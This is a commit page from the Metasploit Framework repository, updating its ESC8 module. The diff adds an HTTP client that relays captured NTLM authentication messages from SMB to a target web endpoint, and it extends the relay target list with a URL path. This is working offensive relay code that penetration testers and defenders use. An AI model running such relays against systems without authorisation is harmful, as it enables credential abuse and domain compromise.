Update the ESC8 module for the new changes

zeroSteiner · Oct 23, 2024 · 21da735 · 21da735
1 parent 2a80f81
commit 21da735
Show file tree

Hide file tree

Showing 4 changed files with 186 additions and 180 deletions.
diff --git a/lib/msf/core/exploit/remote/smb/relay/ntlm/target.rb b/lib/msf/core/exploit/remote/smb/relay/ntlm/target.rb
@@ -0,0 +1,3 @@
+module Msf::Exploit::Remote::SMB::Relay::NTLM::Target
+  RelayResult = Struct.new(:message, :nt_status)
+end
diff --git a/lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb b/lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb
@@ -0,0 +1,84 @@
+module Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP
+  # The HTTP Client for interacting with the relayed_target
+  class Client
+    extend Forwardable
+
+    def_delegators :@client, :send_recv, :request_cgi, :request_raw
+
+    attr_accessor :timeout
+    attr_reader :target
+
+    def initialize(provider: nil, target: nil, logger: nil, timeout: -1)
+      @logger = logger
+      @provider = provider
+      @target = target
+      @timeout = timeout
+      http_logger_subscriber = Rex::Proto::Http::HttpLoggerSubscriber.new(logger: logger)
+
+      @client = Rex::Proto::Http::Client.new(
+        target.ip,
+        target.port,
+        provider.dispatcher.tcp_socket.context,
+        target.protocol == :https,
+        subscriber: http_logger_subscriber
+      )
+    end
+
+    def self.create(provider, target, logger, timeout)
+      new(
+        provider: provider,
+        target: target,
+        logger: logger,
+        timeout: timeout
+      )
+    end
+
+    # @param [String] client_type1_msg
+    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    def relay_ntlmssp_type1(client_type1_msg)
+      req = @client.request_raw(
+        'method'  => 'GET',
+        'uri'     => @target.path,
+        'headers' => {
+          'Accept-Encoding' => 'identity',
+          'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type1_msg)
+        }
+      )
+      res = @client.send_recv(req, @timeout, true)
+      # todo: handle errors here
+      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
+        message: Net::NTLM::Message.decode64(res.headers['WWW-Authenticate'].split[1]),
+        nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
+      )
+    end
+
+    # @param [String] client_type3_msg
+    # @rtype [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
+    def relay_ntlmssp_type3(client_type3_msg)
+      req = @client.request_raw(
+        'method'  => 'GET',
+        'uri'     => @target.path,
+        'headers' => {
+          'Accept-Encoding' => 'identity',
+          'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type3_msg)
+        }
+      )
+      res = @client.send_recv(req, @timeout, true)
+
+      if res.code.between?(200, 299)
+        nt_status = WindowsError::NTStatus::STATUS_SUCCESS
+      else
+        nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
+      end
+      Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
+    end
+
+    protected
+
+    attr_reader :logger
+
+    def display_target(target)
+      "#{target.protocol}://#{target.ip}:#{target.port}" + (target.path.blank? ? '/' : target.path)
+    end
+  end
+end
diff --git a/lib/msf/core/exploit/remote/smb/relay/target_list.rb b/lib/msf/core/exploit/remote/smb/relay/target_list.rb
@@ -6,14 +6,15 @@ class TargetList
     include MonitorMixin
 
     # @param [String] targets
-    def initialize(protocol, port, targets, randomize_targets: true)
+    def initialize(protocol, port, targets, path=nil, randomize_targets: true)
       super()
 
       targets = Rex::Socket::RangeWalker.new(targets).to_enum(:each_ip).map do |target_ip|
         Target.new(
           ip: target_ip,
           port: port,
-          protocol: protocol
+          protocol: protocol,
+          path: path
         )
       end
       @targets = randomize_targets ? targets.shuffle : targets
@@ -57,10 +58,11 @@ def next_target_for(identity)
   end
 
   class Target
-    def initialize(ip:, port:, protocol:)
+    def initialize(ip:, port:, protocol:, path: nil)
       @ip = ip
       @port = port
       @protocol = protocol
+      @path = path
       @relay_state = Hash.new do |hash, identity|
         hash[identity] = {
           relay_status: nil,
@@ -71,7 +73,7 @@ def initialize(ip:, port:, protocol:)
       end
     end
 
-    attr_reader :ip, :port, :protocol
+    attr_reader :ip, :port, :protocol, :path
 
     def eligible_relay_target?(identity)
       return true if identity.nil?
@@ -103,7 +105,7 @@ def on_relay_end(identity:, is_success:)
     end
 
     def to_h
-      { ip: ip, port: port, protocol: protocol, relay_state: @relay_state }
+      { ip: ip, port: port, protocol: protocol, path: path, relay_state: @relay_state }
     end
 
     private